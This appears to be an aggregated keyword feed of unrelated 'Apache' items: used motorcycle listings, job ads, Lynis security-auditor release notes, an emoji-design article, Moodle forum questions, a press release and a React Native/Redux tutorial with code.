Next Page: 10000

           2012 TVS Apache RTR 33500 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 33,000, Model: Apache RTR, Year: 2012 , KM Driven: 33,500 km,
2012 TVS Apache RTR 33500 Kms https://www.olx.in/item/2012-tvs-apache-rtr-33500-kms-ID1lMgQP.html
           2015 TVS Apache RTR 300000 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 40,000, Model: Apache RTR, Year: 2015 , KM Driven: 3,00,000 km,
Apache RTR 160
Brought Date 2015 November
Yellow Color
Rear Tyre Changed Recently
Interested Ping Me or Send Your Number https://www.olx.in/item/2015-tvs-apache-rtr-300000-kms-ID1lLJiP.html
           2011 TVS Apache RTR 47 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 22,000, Model: Apache RTR, Year: 2011 , KM Driven: 47 km,
I want sell my apache rtr 160 dts, dual disk ..call 79o4691193..kicker spring prblm https://www.olx.in/item/2011-tvs-apache-rtr-47-kms-ID1lLCgh.html
          Senior Cloud/Web Infrastructure Engineer - RK Management Consultants, Inc. - Minneapolis, MN      Cache   Translate Page   Web Page Cache   
Develop operational practice for technologies like Opscode Chef, multiple Public Cloud platforms, Basho Riak, Cassandra, Tomcat, Apache, Nginx, Sensu, Splunk,...
From Indeed - Tue, 19 Jun 2018 15:06:13 GMT - View all Minneapolis, MN jobs
          Administrative Dept Clerk II - Apache Corp - Canadian, TX      Cache   Translate Page   Web Page Cache   
Manage calendars, answer phones and screen to control interruptions. Ensures arrangements for meetings and conference calls, including coordinating logistics,...
From Apache Corp - Mon, 09 Jul 2018 13:02:23 GMT - View all Canadian, TX jobs
          How To Install SBT and Scala on Ubuntu Server      Cache   Translate Page   Web Page Cache   

Here Are The Steps on How To Install SBT and Scala on Ubuntu Server. sbt is a build tool for Scala and Java projects Like Apache Maven, Apache Ant.

The post How To Install SBT and Scala on Ubuntu Server appeared first on The Customize Windows.


          Lynis 2.6.6 - Security Auditing Tool for Unix/Linux Systems      Cache   Translate Page   Web Page Cache   

We are excited to announce this major release of auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next of simplification improvements we made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests, to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization the program, up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic Scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog
Upgrade note
## Lynis 2.6.6

### Improvements
* New format of changelog (https://keepachangelog.com/en/1.0.0/)
* KRNL-5830 - improved log text about running kernel version

### Fixed
* Under some condition no hostid2 value was reported
* Solved 'extra operand' issue with tr command


Download Lynis 2.6.6

          Pickleball      Cache   Translate Page   Web Page Cache   
(South 8th and Apache streets). Loaner paddles are available if you don’t have one. Follow these topics:
          WebPanel install      Cache   Translate Page   Web Page Cache   
Need ISPConfig web panel installed on an Open VZ plan that I have. Full software etc can be found at ISPconfig.org Can be done on Debian 8, Ubuntu 14, or Centos 7. No particular difference to me. Payment... (Budget: $10 - $30 USD, Jobs: Apache, Debian, Linux, PHP, Ubuntu)
          Apache Tomcat x64 9.0.10      Cache   Translate Page   Web Page Cache   
An open source software implementation of the Java Servlet and JavaServer Pages
          Apache Tomcat 9.0.10      Cache   Translate Page   Web Page Cache   
An open source software implementation of the Java Servlet and JavaServer Pages
          ArangoDB 3.3.9.4 发布,分布式原生多模型数据库      Cache   Translate Page   Web Page Cache   

ArangoDB 3.3.9.4 已发布。ArangoDB 是一个开源的分布式原生多模型数据库 (Apache 2 license)。

理念  

利用一个引擎,一个 query 语法,一项数据库技术,以及多个数据模型,来最大力度满足项目的灵活性,简化技术堆栈,简化数据库运维,降低运营成本。

ArangoDB原生多模型数据库,指的是兼有图 (graph)、文档 (document)和键/值对 (key/value) 三种数据模型存储软件。其快捷灵活之处在于,它有适用于全部三种数据模型的统一内核和统一数据库查询语言——AQL (ArangoDB Query Language)。其可以涵盖全部三种数据模型,还允许在单个查询中混合使用三种数据模型。

因此,用户可以在单次查询过程中混合使用多种数据模型,而无需在不同数据模型间相互“切换”,也不需要执行数据传输过程。并且这三种数据模型均支持水平扩展。基于其本地集成多模型特性,ArangoDB 原生多模型数据库适用于搭建高性能应用程序。

更新内容请关注发布主页,或参阅 ChangeLog

下载地址:


          Need help with a Bug Fix for an Apache Cordova Smartphone App (also future enhancements/maintenance)      Cache   Translate Page   Web Page Cache   
I have an ios/android smartphone app that was built using Apache Cordova and Visual Studio. I need help with an ios-only bug fix on the existing version and also looking for a long term relationship for... (Budget: $15 - $25 USD, Jobs: Android, iPhone, Mobile App Development, PhoneGap, PHP)
          Need help with a Bug Fix for an Apache Cordova Smartphone App (also future enhancements/maintenance)      Cache   Translate Page   Web Page Cache   
I have an ios/android smartphone app that was built using Apache Cordova and Visual Studio. I need help with an ios-only bug fix on the existing version and also looking for a long term relationship for... (Budget: $15 - $25 USD, Jobs: Android, iPhone, Mobile App Development, PhoneGap, PHP)
          Need help with a Bug Fix for an Apache Cordova Smartphone App (also future enhancements/maintenance)      Cache   Translate Page   Web Page Cache   
I have an ios/android smartphone app that was built using Apache Cordova and Visual Studio. I need help with an ios-only bug fix on the existing version and also looking for a long term relationship for... (Budget: $15 - $25 USD, Jobs: Android, iPhone, Mobile App Development, PhoneGap, PHP)
          Spirit of Prophecy: Paranormal and Sci-Fi Crime by JJ Hughes      Cache   Translate Page   Web Page Cache   
J.J Hughes was born in Cottingley, a quaint little village in West Yorkshire, UK. Her grandfather Arthur Shackleton [was related to Sir Ernest Shackleton, the polar explorer - but the furthest grand-dad travelled perhaps was up the road to the men -only social club, but then he rose early and worked long and hard and filled the house with the amazing aromas of freshly baked cakes and bread..so could not be kneading dough and adventuring at the same time. Mouths always have to be fed, don't they and baking is hard, hot, thirsty work] J.J. Hughes parents Margaret and Arnold Simpson lived with her grandfather above the shop, the house was large, old and rambling with a proliferation of attics and spider filled cellars, if you cared to look closely- generally the author did not, preferring to spend her time playing catch, hop-scotch and the like in the cobbled streets, catching minnows in the beck [a small stream] or swimming beneath the waterfall which is famous for fairies, after two local girls [Elsie Wright and Frances Griffiths] photographed them in 1917 [Or did they?]. Subsequently the photo's proved to be fake, and this inspired a movie called 'Fairy Tale: A True Story' which starred Peter O'Toole playing Sir Arthur Conan Doyle [the creator/author of Sherlock Holmes.] He was taken in by the hoax, but then again to this day J.J.Hughes believes in elves/fairies/mermaids/unicorns and all things Elemental and Other Worldly. Authors Favourite box set : Game of Thrones. Favourite Movies: Star Wars, Independence Day, The Arrival...... Spirit of Prophecy....[Ha,ha- calling all film directors...?] .....What are we without an open heart and mind fired by imagination, after all? Nearby to Cottingley is the author's Favourite Place: think Hovis ad's , steam trains, cobbled streets, try Tetleys real ale in Haworth, which is famous for the wild moors and the Bronte sisters - who wrote 'Wuthering Heights' and 'Jane Eyre' which are two of her Favourite Novels , along with 'Pride and Prejudice' [Jane Austen] and 'Gone with the Wind' [Margaret Mitchell]. Feisty heroines and fill-their-boots heroes, win hands down every time? From her early teens J.J Hughes was a passionate horse owner and regularly competed in Affiliated junior showjumping competitions. In it's day West Yorkshire produced a lot of England's top show jumpers, true Northern grit we guess? Or where there's horse muck, there's brass! In her debut novel 'Spirit of Prophecy' there's an Olympic gold medal event horse called Gothic [aka Gothic novel's, a much loved genre] and his feisty owner/rider Juliet Jermaine. Age 17 the author wrote a humorous pony novel which was bashed out on a neon orange little type writer [thank heavens for Word Processors, spell checking] and bye-bye Tippex and White-out- some things disappear and are not mourned or missed. J.J.Hughes was blessed and inspired by two incredible English teachers,[ who back then were a husband and wife team] Paddy and Vanda, and thanks to Paddy, a brilliant photographer [a passionate, Irish man with big beard, bowler hat and rather eccentric black flowing cape] she developed a life long love of film as a medium. Later, after leaving school, she studied English/American Literature with Film Studies at the University of East Anglia [U.E.A.] Norwich, and subsequently an MA in Creative Writing at Surrey University. Career wise, after a year or so teaching English abroad she accidentally landed a job in the City of London in an Investment Bank - how this came about let alone endured... this is still a mystery to all concerned. Later after three amazing children came along, she quit the City and headed for the Surrey Hills and trained as a Life Coach and Passion Test Facilitator, and went on to co-author a No 1 Best Selling Spiritual self help book called 'Inspired by the Passion Test' and in the vein of giving back all profits go to charity. More about the green energy of Giving Money in her next planned self help book: 'Pursing the Passion,' which is about how to get clear on your Life Purpose and annex your Passions and Skills to make money and earn extra income doing what you love.... J.J Hughes is passionate about horses, the paranormal, New Age spirituality, self-development, travel, karma and reincarnation, crime...justice..... in no particular order. She has had numerous prophetic premonitions - usually about death, which so far despite a few close shaves she has escaped.[Pinch test just to check she's still alive - yes that hurt!] She came to believe in reincarnation in her mid-twenties when her old horse Red made a re-appearance, this time as a palomino called Hooray Henry. Sometimes when we don't get the ending right or learn the lessons they boomerang right back and bite us on the ass. Quite literally in Red's case as he was one mean S.O.B- a bad tempered hot headed sort who would not only bite the devoted -hay-bearers but also kick them on the way out too! Now, having survived the loving attentions of various equines, and a serious riding accident requiring airlifting into A+E plus a long stint in a wheel chair, the author has finally hung up her spurs as it were. She's an experienced Coach/Mentor, Passion Test Facilitator and Soul Re-alignment specialist and topics currently piquing her interest are Spirituality and Science where she's hoping to see more inter-disciplinary co-operation, to solve the great remaining mysteries of life including man's origins. On that note she's keen on Panspermia - the theory of life being seeded from outer space. She's mighty curious about Aliens- when will they come out of the closets - and what are the ethical, moral and other massive implications of A.I. and Robots? Will the FANGS [Facebook, Amazon, Netflix, Google..sorts] colonise Mars- will we get all the plastic out of the seas? Will humanity swap hugs and harmony for mass destruction? Guess where y sequel novel is going - it starts with psychic CID Rosetta Barrett and Juliet Jermaine [the victim] packing up camp on the Apache Indian Reservation where they left off in 'Spirit of Prophecy' and heading out on a road trip along the Alien Highway and heading for Area 51..... Happy UFO spotting y'all..... The author would love to connect with her readers, get in touch via her website: www.moneymagnet.global or leave a review here on Amazon, she'd love to hear your feedback to improve her work and find out what's rocking your boat, spinning your wheels...and so forth. Love and Light from J.J.Hughes x
          Stateful Stream Processing con Apache Flink      Cache   Translate Page   Web Page Cache   
Apache FlinkNella prima parte di questa serie di articoli su Flink ci siamo dedicati alla descrizione dello Stream Processing in generale e di Apache Flink in particolare, in questa seconda parte ci occuperemo di come in pratica scrivere una applicazione Apache Flink.
Figura 1

          為什麼Emoji 在不同平台長得不一樣?有時還會出現無法識別的亂碼       Cache   Translate Page   Web Page Cache   
今年6 月,最新一波共157 個emoji 已經正式加入到Unicode 11.0,它們將陸續出現在不同手機、APP上。但這些新的emoji 還需要被各家平台的設計師改造一番後,我們才會見到。Android系統作為全球最多人使用的手機系統,他們所設計改造的emoji也將影響著十多億的人。

為什麼Emoji 在不同平台長得不一樣?有時還會出現無法識別的亂碼

近日,Google的Android平台表情包設計總監珍妮佛·丹尼爾(Jennifer Daniel)接受了CNBC的專訪,講述了  Android平台改造設計emoji的理念

每個Emoji 都是品牌的延伸

丹尼爾並不能決定哪些圖標圖案會成為emoji,她要做的,是讓emoji 變得更加「Google」。

我認為每一個emoji 都是平台品牌的延伸。

為什麼Emoji 在不同平台長得不一樣?有時還會出現無法識別的亂碼

很多平台都會以自己的設計理論、品牌風格來重新解讀emoji 表情。翻白眼的emoji 為例,蘋果迷戀設計,因此他們的版本更加立體,漸層和陰影的細節非常考究;微軟的版本有著又黑又粗的邊框,應該是要和文字明顯區分開來;Twitter 是發短訊息起家的社群平台,因此他們的emoji 非常簡潔,基本沒有陰影漸層這些細節;Google 則是更加輕鬆和卡通化。

為什麼Emoji 在不同平台長得不一樣?有時還會出現無法識別的亂碼

三星在今年2月宣布更新他們的emoji,更新前的版本Samsung Experience 8.5的表情比較複雜,動漫化的程度高,而且不同的emoji應該有不同的角度和方向,因此經常有人會對表情理解有誤而會錯意。到了9.0版本,emoji也簡潔明了、整齊劃一了不少。

對於Google 的風格,丹尼爾說:「當你想到我們的產品時,我們希望你會微笑,所以我們嘗試去讓emoji 表現得更加輕鬆愉快,因此我們的emoji 更加卡通。」

每一個emoji,就是一個Unicode 字符。全世界的emoji 都由統一碼聯盟(The Unicode Consortium)來投票選拔和公佈,世界各地的人們可以向聯盟提交emoji 提案。而統一碼聯盟的emoji 規範,只是定義了某個字符的語義,再由Emojipedia 這個網站對emoji 進行描述表達,最後允許大家按照對描述的理解,自由地去設計圖案。

Emoji 設計裡的價值觀

6 月,Emojipedia 公佈了Unicode 12.0 的候選emoji 列表,其中就有斧頭、火烈鳥、潛水鏡等新的emoji,也有殘障人士、印度朋友的專屬。不過這些候選emoji 最後是否會被人們使用,還需要看它們能否被通過。

為什麼Emoji 在不同平台長得不一樣?有時還會出現無法識別的亂碼

每年3 月份左右,一旦新的emoji 公佈,丹尼爾這些負責重新解讀和設計emoji 的設計師們,就要忙碌起來了。她不僅要考慮用戶的使用場景,「我們設計的emoji,在什麼情況下會被用戶使用?」,還需要思考如何處理細節,比如「飛盤上的哪些線條可以增加動感」。

然而不同平台重新設計後的emoji,在跨平台使用時,經常會出現亂碼。比如iPhone 用戶在朋友圈發了個比較少見的emoji,有些使用Android 手機的朋友,看到的只是一個無法識別的亂碼。

丹尼爾表示,這是因為各個平台在改造emoji 的時候,相互之間並不會有太多的溝通,雖然他們都在統一碼聯盟委員會裡面,但他們更多是在討論emoji 的文本、體驗和文件大小,而不會去討論各自的設計。

不得不說,各家廠商的設計,也在透露著各自的價值觀。

為什麼Emoji 在不同平台長得不一樣?有時還會出現無法識別的亂碼

比如近些年,Google 和蘋果都在為emoji 的多元化而努力。Google 在6 月初發布Android P 測試版的時候,更新了不少「中性性別」的emoji,並且「父母」「戀人」這些組合已經不再預設是一男一女的搭配。

早在2015 年,蘋果就在iOS 和OS X 中加入了不同膚色的選項,也加入了同性伴侶的家庭組合。

版權才是讓Emoji 有諸多變臉的原因

讓同一個編碼的emoji 擁有諸多變臉,除了是各個平台有著自己的價值觀和設計風格,更重要的是emoji 設計的版權問題。這一點,Android 的表情包設計總監丹尼爾在接受CNBC 的採訪時,並沒有提及太多。

為什麼Emoji 在不同平台長得不一樣?有時還會出現無法識別的亂碼

事實上,一個emoji的版權細節可能設計多方的利益:

emoji的官方名字版權屬於Unicode規範,即統一碼聯盟;
emoji的描述文字版權,屬於網站emojipedia.org;
emoji對應的圖形設計版權,屬於它的創作者或公司。

蘋果在設計和推廣emoji 上,走在時代尖端因此也風靡全球,它的這套emoji 被稱為「Apple Color Emoji」,版權屬於蘋果。作為蘋果使用者,可以在系統中使用這一套emoji 字體,但是沒有權限在其他非蘋果設備上安裝使用這套字體。

Google 的Android Emoji 倒是遵守Apache Licene 2.0 的開源協議, 但是很多人並不認可這一套表情符號的設計,人們依然是對蘋果那套emoji 比較熟悉。

為什麼Emoji 在不同平台長得不一樣?有時還會出現無法識別的亂碼

所以不少有著一定規模用戶量的廠商,為了避免版權風險,都會設計自己的emoji 版本,比如Twitter、Facebook、微軟、三星等。

因此,我們能看到每家廠商都沉浸在自己設計的emoji 版本裡無法自拔,還會與時俱進地不斷修改迭代。導致我們這些用戶的體驗是:在跨APP、跨系統的溝通中,一些原本能夠讓人們更好溝通表達的emoji,就成了不可識別的亂碼。

截止至6 月,通過官方審核的emoji 已經達到2823 個,距離1998 年第一批共177 個emoji 被設計出來,已經過去20 年了。它們本應是全球社群媒體上通用的語言符號,如今看來,倒像是被摧毀的巴別塔。

本文受權轉載自愛範兒

加入T客邦Facebook粉絲團
          Middleware Engineer-II (Middleware Senior) - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer-II (Middleware Senior) Job Requirements: Required Skills: 3 – 5 years of Apache administration experience 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Thu, 17 May 2018 04:46:56 GMT - View all McLean, VA jobs
          Middleware Engineers - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer Professional Required Technical Skills Bachelor’s Degree · 3 – 5 years of Apache administration experience · 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Mon, 14 May 2018 10:39:11 GMT - View all McLean, VA jobs
          Home-Based Satellite TV Technician/Installer - DISH Network - Apache, OK      Cache   Translate Page   Web Page Cache   
Must possess a valid driver's license in the State you are seeking employment in, with a driving record that meets DISH's minimum safety standard.... $15 an hour
From DISH - Mon, 09 Jul 2018 19:17:49 GMT - View all Apache, OK jobs
          LEAD SALES ASSOCIATE-FT - Dollar General - Apache, OK      Cache   Translate Page   Web Page Cache   
Occasional or regular driving/providing own transportation to make bank deposits, attend management meetings and travel to other Dollar General stores....
From Dollar General - Fri, 27 Apr 2018 11:14:28 GMT - View all Apache, OK jobs
          Personal Care Aide - May's Plus, Inc. - Apache, OK      Cache   Translate Page   Web Page Cache   
Has a telephone and dependable transportation, valid driver’s license and liability insurance. Provides assistance with non-technical activities of daily living...
From May's Plus, Inc. - Tue, 17 Apr 2018 14:05:28 GMT - View all Apache, OK jobs
          SMTP Gmail delay while sending emails      Cache   Translate Page   Web Page Cache   
by Vytautas Krasauskas.  

Hello,

Moodle version 3.5.1

Ubuntu 18.04 digitalocean droplet

standard apache/mysql/php install from the repos

this is a restored setup from a different host. Email has never been configured before, cannot check if it worked.

cronjob is running

smtp host: smtp.gmail.com:587 (same behaviour as without the port being specified)

smtp security: tls

smtp auth type: any, they all behave the same

username: appropriate username

password: app specific password

smtp limit: 1

captcha thing done


At first I was testing using the forgotten password function, but later installed the mail test plugin. Behaviour is the same - email gets delivered, but it takes about 2.5 - 3 minutes for it to arrive. In the mean time, the page keeps loading. Clicking any other internal link does not work, the page just keeps loading until the email eventually gets sent. Same behaviour with new user registration. This makes me want to tear my hair out.

Any suggestions?

Sincerely yours.


          Atto Editor 3.2.9      Cache   Translate Page   Web Page Cache   
by Jane Eckert.  

I was working with the Paragraph styles in the Atto editor and have found inconsistencies with V3.1.9. 

Chrome and Firefox
Pre-formatted style no longer puts a shaded box around the wording.

Chrome
Table text cannot be changed back to paragraph after a different style is selected.

Firefox
Table text cannot be formatted (the font remains the same no matter what paragraph style is selected).

We have instructors that use both the pre-formatted style and tables in the Atto editor and I'm sure I'll get questions. Any insight would be greatly appreciated.

Our system setup:
OS - RedHat Linux 7.5
Web server - Apache 2.4
Database - PostgreSQL 9.2
PHP - 5.4



          Administrateur système / Analyste de systèmes - Centre de la sécurité des télécommunications Canada - Ottawa, ON      Cache   Translate Page   Web Page Cache   
Logiciels commerciaux et de sources ouvertes (Apache, Salt, Ansible, IBM Tivoli). Sommaire du poste....
From Workland - Thu, 14 Jun 2018 19:14:54 GMT - View all Ottawa, ON jobs
          Systems Administrator / Systems Analyst - Centre de la sécurité des télécommunications Canada - Ottawa, ON      Cache   Translate Page   Web Page Cache   
Open source and commercial software (Apache, Salt, Ansible, IBM Tivoli). Please apply online via our website:....
From Workland - Thu, 14 Jun 2018 19:14:54 GMT - View all Ottawa, ON jobs
          XAMPP 7.2.7-0      Cache   Translate Page   Web Page Cache   
A very easy to install Apache distribution for Linux, Solaris, and Windows. 2018-07-10
          Administrateur système / Analyste de systèmes - Centre de la sécurité des télécommunications Canada - Ottawa, ON      Cache   Translate Page   Web Page Cache   
Logiciels commerciaux et de sources ouvertes (Apache, Salt, Ansible, IBM Tivoli). Sommaire du poste....
From Workland - Thu, 14 Jun 2018 19:14:54 GMT - View all Ottawa, ON jobs
          Systems Administrator / Systems Analyst - Centre de la sécurité des télécommunications Canada - Ottawa, ON      Cache   Translate Page   Web Page Cache   
Open source and commercial software (Apache, Salt, Ansible, IBM Tivoli). Please apply online via our website:....
From Workland - Thu, 14 Jun 2018 19:14:54 GMT - View all Ottawa, ON jobs
          Geospatial Corporation Provides Pipeline Data Collection and Mapping Solutions in Permian Basin of West Texas for Global Energy Company      Cache   Translate Page   Web Page Cache   

Company Plans New Operations Hub in Midland, Texas

PITTSBURGH, PA / ACCESSWIRE / July 10, 2018 / Geospatial Corporation (OTCQB: GSPH) has successfully completed the accurate 3D mapping of several newly installed pipelines in the Permian Basin of west Texas for a major global energy company. To better serve the demand for accurate and economical pipeline location and mapping, Geospatial is opening a permanent operations center in Midland, Texas to serve the central states region encompassing Texas, New Mexico, Colorado and Louisiana.

Mark Smith, CEO of Geospatial Corporation said, "Our data acquisition techniques and software are extremely accurate and economical. We provide data for our client's systems of record that is traceable, verifiable and complete."

The Permian Basin of West Texas

The Permian Basin of West Texas and southeast New Mexico is known as the most prolific oil and gas regions in the country and is bountiful with supplies. Operators like Pioneer Natural Resources (PXD), Chevron (CVX), ExxonMobil (XON), Apache (APA), Occidental Petroleum (OXY) and Concho Resources (CXO) have announced multi-billion dollar direct investments in the region to increase production. "According to a recent report in Seeking Alpha, there's just not enough space in existing pipelines currently for the gas that is being marketed." Smith added, "As our clients invest in new pipeline infrastructure, it is an ideal time to gather accurate locational pipeline data."

The need to manage our underground infrastructure is being driven by a multitude of timely factors. The oil and gas industry with new regulations is charged with knowing everything about their pipeline infrastructure from the wellhead to the home. These requirements encompass every part of the nation's massive energy pipeline infrastructure from upstream, midstream and downstream.

About Geospatial Corporation

Geospatial Corporation delivers Locational 3D Data, Information Technology, Software and Program Management Services that provide a scalable solution to improve our clients' ability to securely, accurately and economically map and manage our global underground infrastructure including energy pipelines, sewers, water lines, conduits, and cables.

Forward Looking Statements

This press release contains forward-looking information within the meaning of the Private Securities Litigation Reform Act of 1995, Section 27A of the Securities Act of 1993 and Section 21E of the Securities Exchange Act of 1934 and is subject to the safe harbor created by those laws. These forward-looking statements, if any, are based upon a number of assumptions and estimates that are subject to significant uncertainties that involve known and unknown risks, many of which are beyond our control and are not guarantees of future performance. Actual outcomes and results could materially differ from what is expressed, implied, or forecasted in any such forward-looking statements and any such difference may be caused by risk factors listed from time to time in the Company's news releases and/or its filings or as a result of other factors.

Contact Info

Mark Smith/CEO
Geospatial Corporation
Mark.Smith@GeospatialCorp.com
www.GeospatialCorporation.com
www.GeoUnderground.com
O - 724-353-3400

SOURCE: Geospatial Corporation

ReleaseID: 504903


          从 React Native 到微服务,落地一个全栈解决方案      Cache   Translate Page   Web Page Cache   

framework

Poplar是一个社交主题的内容社区,但自身并不做社区,旨在提供可快速二次开发的开源基础套件。前端基于React Native与Redux构建,后端由Spring Boot、Dubbo、Zookeeper组成微服务对外提供一致的API访问。

https://github.com/lvwangbeta/Poplar

framework

React Native虽然提供跨平台解决方案,但并未在性能与开发效率上做出过度妥协,尤其是对于有JS与CSS基础的开发人员入手不会很难,不过JSX语法糖需要一定的适应时间,至于DOM结构与样式和JS处理写在一起是否喜欢就见仁见智了,可这也是一个强迫你去模块化解耦的比较好的方式。由于React组件的数据流是单向的,因此会引入一个很麻烦的问题,组件之间很难高效通信,尤其是两个层级很深的兄弟节点之间通信变得异常复杂,对上游所有父节点造成传递污染,维护成本极高。为此Poplar引入了Redux架构,统一管理应用状态。

模块化

framework

APP由5个基础页面构成,分别是Feed信息流主页(MainPage)、探索发现页面(ExplorePage)、我的账户详情页(MinePage)、状态创建于发送页(NewFeed)、登录注册页面(LoginRegPage)等。页面又由基础组件组成,如Feed列表、Feed详情、评论、标签、相册等等。如果与服务器交互,则统一交由API层处理。

framework

页面底部由TabNavigator包含5个TabNavigator.Item构成,分别对应基础页面,如果用户未登录,则在点击主页或新增Tab时呼出登录注册页面。

Redux

引入Redux并不是赶潮流,而且早在2014年就已经提出了Flux的概念。使用Redux主要是不得不用了,Poplar组件结构并非特别复杂,但嵌套关系较多,而且需要同时支持登录与非登录情况的信息流访问,这就需要一个统一的状态管理器来协调组件之间的通信和状态更新,而Redux很好的解决了这个问题。

这里不枯燥的讲解Redux的架构模型了,而是以Poplar中的登录状态为例来简单说下Redux在Poplar项目中是如何使用的。

Poplar使用React-Redux库,一个将Redux架构在React的实现。

1. 场景描述

在未登录情况下,如果用户点击Feed流页面会弹出登录/注册页面,登录或注册成功之后页面收回,同时刷新出信息流内容。下图中的App组件是登录页面和信息流主页兄弟节点的共同父组件。

framework

这个需求看似简单,但如果没有Redux,在React中实现起来会很蹩脚而且会冗余很多无用代码调用。

首先我们看下在没有Redux的情况下是如何实现这一业务流程的?

在点击Tabbar的第一个Item也就是信息流页签时,要做用户是否登录检查,这个检查可以通过查看应用是否本地化存储了token或其他验签方式验证,如果未登录,需要主动更新App组件的state状态,同时将这个状态修改通过props的方式传递给LoginPage,LoginPage得知有新的props传入后更新自己的state:{visible:true}来呼出自己,如果客户输入登录信息并且登录成功,则需要将LoginPage的state设置为{visible:false}来隐藏自己,同时回调App传给它的回调函数来告诉父附件用户已经登录成功,我们算一下这仅仅是两个组件之间的通信就要消耗1个props变量1个props回调函数和2个state更新,到这里只是完成了LoginPage通知App组件目前应用应该处于已登录状态,但是还没有刷新出用户的Feed流,因为此时MainPage还不知道用户已登录,需要App父组件来告知它已登录请刷新,可怎样通知呢?React是数据流单向的,要想让下层组件更新只能传递变化的props属性,这样就又多了一个props属性的开销,MainPage更新关联的state同时刷新自己获取Feed流,这才最终完成了一次登录后的MainPage信息展示。通过上面的分析可以看出Poplar在由未登录到登录的状态转变时冗余了很多但是又没法避免的参数传递,因为兄弟节点LoginPage与MainPage之间无法简单的完成通信告知彼此的状态,就需要App父组件这个桥梁来先向上再向下的传递消息。

再来看下引入Redux之后是如何完成这一同样的过程的:

还是在未登录情况下点击主页,此时Poplar由于Redux的引入已经为应用初始了全局登录状态{status: 'NOT_LOGGED_IN'},当用户登录成功之后会将该状态更新为{status: 'LOGGED_IN'},同时LoginPage与此状态进行了绑定,Redux会第一时间通知其更新组件自己的状态为{visible:false}。与此同时App也绑定了这个由Redux管理的全局状态,因此也同样可以获得{status: 'LOGGED_IN'}的通知,这样就可以很简单的在客户登录之后隐藏LoginPage显示MainPage,是不是很简单也很神奇,完全不用依赖参数的层层传递,组件想要获得哪个全局状态就与其关联就好,Redux会第一时间通知你。

2. 实现

以实际的代码为例来讲解下次场景的React-Redux实现:

connect

在App组件中,通过connect方法将UI组件生成Redux容器组件,可以理解为架起了UI组件与Redux沟通的桥梁,将store于组件关联在一起。

import {showLoginPage, isLogin} from  './actions/loginAction';
import {showNewFeedPage} from './actions/NewFeedAction';

export default connect((state) => ({
  status: state.isLogin.status, //登录状态
  loginPageVisible: state.showLoginPage.loginPageVisible
}), (dispatch) => ({
  isLogin: () => dispatch(isLogin()),
  showLoginPage: () => dispatch(showLoginPage()),
  showNewFeedPage: () => dispatch(showNewFeedPage()),
}))(App)

connect方法的第一个参数是mapStateToProps函数,建立一个store中的数据到UI组件props对象的映射关系,只要store更新了就会调用mapStateToProps方法,mapStateToProps返回一个对象,是一个UI组件props与store数据的映射。上面代码中,mapStateToProps接收state作为参数,返回一个UI组件登陆状态与store中state的登陆状态的映射关系以及一个登陆页面是否显示的映射关系。这样App组件状态就与Redux的store关联上了。

第二个参数mapDispatchToProps函数允许将action作为props绑定到组件上,返回一个UI组件props与Redux action的映射关系,上面代码中App组件的isLoginshowLoginPageshowNewFeedPageprops与Redux的action建立了映射关系。调用isLogin实际调用的是Redux中的store.dispatch(isLogin)action,dispatch完成对action到reducer的分发。

Provider

connect中的state是如何传递进去的呢?React-Redux 提供Provider组件,可以让容器组件拿到state

import React, { Component } from 'react';
import { Provider } from 'react-redux';
import configureStore from './src/store/index';

const store = configureStore();

export default class Root extends Component {
  render() {
    return (
      <Provider store={store}>
        <Main />
      </Provider>
    )
  }
}

上面代码中,Provider在根组件外面包了一层,这样一来,App的所有子组件就默认都可以拿到state了。

Action & Reducer

组件与Redux全局状态的关联已经搞定了,可如何实现状态的流转呢?登录状态是如何扩散到整个应用的呢?

这里就需要Redux中的Action和Reducer了,Action负责接收UI组件的事件,Reducer负责响应Action,返回新的store,触发与store关联的UI组件更新。

export default connect((state) => ({
  loginPageVisible: state.showLoginPage.loginPageVisible,
}), (dispatch) => ({
  isLogin: () => dispatch(isLogin()),
  showLoginPage: (flag) => dispatch(showLoginPage(flag)),
  showRegPage: (flag) => dispatch(showRegPage(flag)),
}))(LoginPage)

this.props.showLoginPage(false);
this.props.isLogin();

